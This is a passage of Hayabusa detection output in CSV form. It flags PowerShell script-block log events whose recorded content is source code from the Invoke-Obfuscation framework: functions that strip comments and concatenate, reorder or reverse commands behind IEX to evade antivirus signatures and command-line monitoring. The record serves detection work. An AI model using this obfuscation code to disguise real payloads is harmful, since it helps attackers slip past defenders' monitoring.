if it is acting as a standalone invoke operator (either at the beginning of the script or immediately preceded by ; or whitespace) If(($PrevChar -eq ' ') -OR ($PrevChar -eq ';')) {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} } } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-RemoveComments { <# .SYNOPSIS Obfuscates variable token by removing all comment tokens. This is primarily since A/V uses strings in comments as part of many of their signatures for well known PowerShell scripts like Invoke-Mimikatz. Invoke-Obfuscation Function: Out-RemoveComments Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RemoveComments obfuscates a given token by removing all comment tokens from the provided PowerShell script to evade detection by simple IOCs or A/V signatures based on strings in PowerShell script comments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. 
.EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green #COMMENT"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Comment'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RemoveComments $ScriptString $Token} C:\PS> $ScriptString $Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green #COMMENT} 'Comment' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Remove current Comment token. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.249 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedStringCommand { <# .SYNOPSIS Master function that orchestrates the application of all string-based obfuscation functions to provided PowerShell script. 
Invoke-Obfuscation Function: Out-ObfuscatedStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given input PowerShell payload. If not defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .EXAMPLE C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 IEX ((('Write-H'+'ost x'+'lcHello'+' Wor'+'ld!xlc -F'+'oregroundC'+'o'+'lor Gre'+'en'+'; Write-Host '+'xlcObf'+'u'+'sc'+'ation '+'Rocks!xl'+'c'+' '+'-'+'Foregrou'+'nd'+'C'+'olor Green') -Replace 'xlc',[Char]39) ) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} 2 IEX( ((""{17}{1}{6}{19}{14}{3}{5}{13}{16}{11}{20}{15}{10}{12}{2}{4}{8}{18}{7}{9}{0}"" -f ' Green','-H',' ',' ','R','-Foregr','ost qR9He','!qR9 -Foregr','o','oundColor','catio',' ','n','oundColor','qR9','bfus',' Green; Write-Host','Write','cks','llo World!','qR9O')).Replace('qR9',[String][Char]39)) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 $I4 =""noisserpxE-ekovnI|)93]rahC[]gnirtS[,'1Yp'(ecalpeR.)'ne'+'erG roloCd'+'nuo'+'rgero'+'F- 1'+'Y'+'p!s'+'kcoR'+' noit'+'a'+'cs'+'ufbO'+'1'+'Yp '+'tsoH'+'-etirW'+' ;'+'neer'+'G '+'rol'+'oCdnu'+'orger'+'o'+'F'+'-'+' 1'+'Yp'+'!dlroW '+'olleH1Yp '+'t'+'s'+'oH-et'+'irW'( "" ;$I4[ -1 ..- ($I4.Length ) ] -Join '' | Invoke-Expression .NOTES Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('1', '2', '3')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = (Get-Random -Input @(1..3)) # Default to random obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. 
If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-StringDelimitedAndConcatenated $ScriptString} 2 {$ScriptString = Out-StringDelimitedConcatenatedAndReordered $ScriptString} 3 {$ScriptString = Out-StringReversed $ScriptString} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Obfuscation.""; Exit} } Return $ScriptString } Function Out-StringDelimitedAndConcatenated { <# .SYNOPSIS Generates delimited and concatenated version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedAndConcatenated Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString (located in Out-ObfuscatedTokenCommand.ps1), Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1), Out-RandomCase (located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedAndConcatenated delimits and concatenates an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. 
.EXAMPLE C:\PS> Out-StringDelimitedAndConcatenated ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" (('Write-Ho'+'s'+'t'+' {'+'0'+'}'+'Hell'+'o Wor'+'l'+'d!'+'{'+'0'+'} -Foreground'+'Color G'+'ree'+'n; Writ'+'e-'+'H'+'ost {0}Obf'+'usc'+'a'+'tion R'+'o'+'ck'+'s!{'+'0} -Fo'+'reg'+'ro'+'undColor'+' '+'Gree'+'n')-F[Char]39) | Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) # Characters we will substitute (in random order) with randomly generated delimiters. $CharsToReplace = @('$','|','`','\','""',""'"") $CharsToReplace = (Get-Random -Input $CharsToReplace -Count $CharsToReplace.Count) # If $ScriptString does not contain any characters in $CharsToReplace then simply return as is. $ContainsCharsToReplace = $FALSE ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { $ContainsCharsToReplace = $TRUE Break } } If(!$ContainsCharsToReplace) { # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' If(!$PSBoundParameters['PassThru']) { # Encapsulate in necessary IEX/Invoke-Expression(s). 
$ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } # Characters we will use to generate random delimiters to replace the above characters. # For simplicity do NOT include single- or double-quotes in this array. $CharsToReplaceWith = @(0..9) $CharsToReplaceWith += @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $CharsToReplaceWith += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') $DelimiterLength = 3 # Multi-dimensional table containing delimiter/replacement key pairs for building final command to reverse substitutions. $DelimiterTable = @() # Iterate through and replace each character in $CharsToReplace in $ScriptString with randomly generated delimiters. ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { # Create random delimiter of length $DelimiterLength with characters from $CharsToReplaceWith. If($CharsToReplaceWith.Count -lt $DelimiterLength) {$DelimiterLength = $CharsToReplaceWith.Count} $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' # Keep generating random delimiters until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($Delim.ToLower())) { $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' If($DelimiterLength -lt $CharsToReplaceWith.Count) { $DelimiterLength++ } } # Add current delimiter/replacement key pair for building final command to reverse substitutions. $DelimiterTable += , @($Delim,$CharToReplace) # Replace current character to replace with the generated delimiter $ScriptString = $ScriptString.Replace($CharToReplace,$Delim) } } # Add random quotes to delimiters in $DelimiterTable. 
$DelimiterTableWithQuotes = @() ForEach($DelimiterArray in $DelimiterTable) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly choose between a single quote and double quote. $RandomQuote = Get-Random -InputObject @(""'"",""`"""") # Make sure $RandomQuote is opposite of $OriginalChar contents if it is a single- or double-quote. If($OriginalChar -eq ""'"") {$RandomQuote = '""'} Else {$RandomQuote = ""'""} # Add quotes. $Delimiter = $RandomQuote + $Delimiter + $RandomQuote $OriginalChar = $RandomQuote + $OriginalChar + $RandomQuote # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes += , @($Delimiter,$OriginalChar) } # Reverse the delimiters when building back out the reversing command. [Array]::Reverse($DelimiterTable) # Select random method for building command to reverse the above substitutions to execute the original command. # Avoid using the -f format operator (switch option 3) if curly braces are found in $ScriptString. If(($ScriptString.Contains('{')) -AND ($ScriptString.Contains('}'))) { $RandomInput = Get-Random -Input (1..2) } Else { $RandomInput = Get-Random -Input (1..3) } # Randomize the case of selected variable syntaxes. $StringStr = Out-RandomCase 'string' $CharStr = Out-RandomCase 'char' $ReplaceStr = Out-RandomCase 'replace' $CReplaceStr = Out-RandomCase 'creplace' Switch($RandomInput) { 1 { # 1) .Replace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- and double-quote. 
If($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$StringStr][$CharStr]39"" $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } ElseIf($OriginalChar[1] -eq '""') { $OriginalChar = ""[$StringStr][$CharStr]34"" } Else { If(Get-Random -Input (0..1)) { $OriginalChar = ""[$StringStr][$CharStr]"" + [Int][Char]$OriginalChar[1] } } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Delimiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Add reversing commands to $ReversingCommand. $ReversingCommand = "".$ReplaceStr($Delimiter,$OriginalChar)"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = $ScriptString + $ReversingCommand } 2 { # 2) -Replace/-CReplace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. 
If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Del",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.249 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedStringCommand { <# .SYNOPSIS Master function that orchestrates the application of all string-based obfuscation functions to provided PowerShell script. 
Invoke-Obfuscation Function: Out-ObfuscatedStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given input PowerShell payload. If not defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .EXAMPLE C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 IEX ((('Write-H'+'ost x'+'lcHello'+' Wor'+'ld!xlc -F'+'oregroundC'+'o'+'lor Gre'+'en'+'; Write-Host '+'xlcObf'+'u'+'sc'+'ation '+'Rocks!xl'+'c'+' '+'-'+'Foregrou'+'nd'+'C'+'olor Green') -Replace 'xlc',[Char]39) ) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} 2 IEX( ((""{17}{1}{6}{19}{14}{3}{5}{13}{16}{11}{20}{15}{10}{12}{2}{4}{8}{18}{7}{9}{0}"" -f ' Green','-H',' ',' ','R','-Foregr','ost qR9He','!qR9 -Foregr','o','oundColor','catio',' ','n','oundColor','qR9','bfus',' Green; Write-Host','Write','cks','llo World!','qR9O')).Replace('qR9',[String][Char]39)) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 $I4 =""noisserpxE-ekovnI|)93]rahC[]gnirtS[,'1Yp'(ecalpeR.)'ne'+'erG roloCd'+'nuo'+'rgero'+'F- 1'+'Y'+'p!s'+'kcoR'+' noit'+'a'+'cs'+'ufbO'+'1'+'Yp '+'tsoH'+'-etirW'+' ;'+'neer'+'G '+'rol'+'oCdnu'+'orger'+'o'+'F'+'-'+' 1'+'Yp'+'!dlroW '+'olleH1Yp '+'t'+'s'+'oH-et'+'irW'( "" ;$I4[ -1 ..- ($I4.Length ) ] -Join '' | Invoke-Expression .NOTES Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('1', '2', '3')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = (Get-Random -Input @(1..3)) # Default to random obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. 
If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-StringDelimitedAndConcatenated $ScriptString} 2 {$ScriptString = Out-StringDelimitedConcatenatedAndReordered $ScriptString} 3 {$ScriptString = Out-StringReversed $ScriptString} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Obfuscation.""; Exit} } Return $ScriptString } Function Out-StringDelimitedAndConcatenated { <# .SYNOPSIS Generates delimited and concatenated version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedAndConcatenated Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString (located in Out-ObfuscatedTokenCommand.ps1), Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1), Out-RandomCase (located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedAndConcatenated delimits and concatenates an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. 
.EXAMPLE C:\PS> Out-StringDelimitedAndConcatenated ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" (('Write-Ho'+'s'+'t'+' {'+'0'+'}'+'Hell'+'o Wor'+'l'+'d!'+'{'+'0'+'} -Foreground'+'Color G'+'ree'+'n; Writ'+'e-'+'H'+'ost {0}Obf'+'usc'+'a'+'tion R'+'o'+'ck'+'s!{'+'0} -Fo'+'reg'+'ro'+'undColor'+' '+'Gree'+'n')-F[Char]39) | Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) # Characters we will substitute (in random order) with randomly generated delimiters. $CharsToReplace = @('$','|','`','\','""',""'"") $CharsToReplace = (Get-Random -Input $CharsToReplace -Count $CharsToReplace.Count) # If $ScriptString does not contain any characters in $CharsToReplace then simply return as is. $ContainsCharsToReplace = $FALSE ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { $ContainsCharsToReplace = $TRUE Break } } If(!$ContainsCharsToReplace) { # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' If(!$PSBoundParameters['PassThru']) { # Encapsulate in necessary IEX/Invoke-Expression(s). 
$ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } # Characters we will use to generate random delimiters to replace the above characters. # For simplicity do NOT include single- or double-quotes in this array. $CharsToReplaceWith = @(0..9) $CharsToReplaceWith += @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $CharsToReplaceWith += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') $DelimiterLength = 3 # Multi-dimensional table containing delimiter/replacement key pairs for building final command to reverse substitutions. $DelimiterTable = @() # Iterate through and replace each character in $CharsToReplace in $ScriptString with randomly generated delimiters. ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { # Create random delimiter of length $DelimiterLength with characters from $CharsToReplaceWith. If($CharsToReplaceWith.Count -lt $DelimiterLength) {$DelimiterLength = $CharsToReplaceWith.Count} $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' # Keep generating random delimiters until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($Delim.ToLower())) { $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' If($DelimiterLength -lt $CharsToReplaceWith.Count) { $DelimiterLength++ } } # Add current delimiter/replacement key pair for building final command to reverse substitutions. $DelimiterTable += , @($Delim,$CharToReplace) # Replace current character to replace with the generated delimiter $ScriptString = $ScriptString.Replace($CharToReplace,$Delim) } } # Add random quotes to delimiters in $DelimiterTable. 
$DelimiterTableWithQuotes = @() ForEach($DelimiterArray in $DelimiterTable) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly choose between a single quote and double quote. $RandomQuote = Get-Random -InputObject @(""'"",""`"""") # Make sure $RandomQuote is opposite of $OriginalChar contents if it is a single- or double-quote. If($OriginalChar -eq ""'"") {$RandomQuote = '""'} Else {$RandomQuote = ""'""} # Add quotes. $Delimiter = $RandomQuote + $Delimiter + $RandomQuote $OriginalChar = $RandomQuote + $OriginalChar + $RandomQuote # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes += , @($Delimiter,$OriginalChar) } # Reverse the delimiters when building back out the reversing command. [Array]::Reverse($DelimiterTable) # Select random method for building command to reverse the above substitutions to execute the original command. # Avoid using the -f format operator (switch option 3) if curly braces are found in $ScriptString. If(($ScriptString.Contains('{')) -AND ($ScriptString.Contains('}'))) { $RandomInput = Get-Random -Input (1..2) } Else { $RandomInput = Get-Random -Input (1..3) } # Randomize the case of selected variable syntaxes. $StringStr = Out-RandomCase 'string' $CharStr = Out-RandomCase 'char' $ReplaceStr = Out-RandomCase 'replace' $CReplaceStr = Out-RandomCase 'creplace' Switch($RandomInput) { 1 { # 1) .Replace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- and double-quote. 
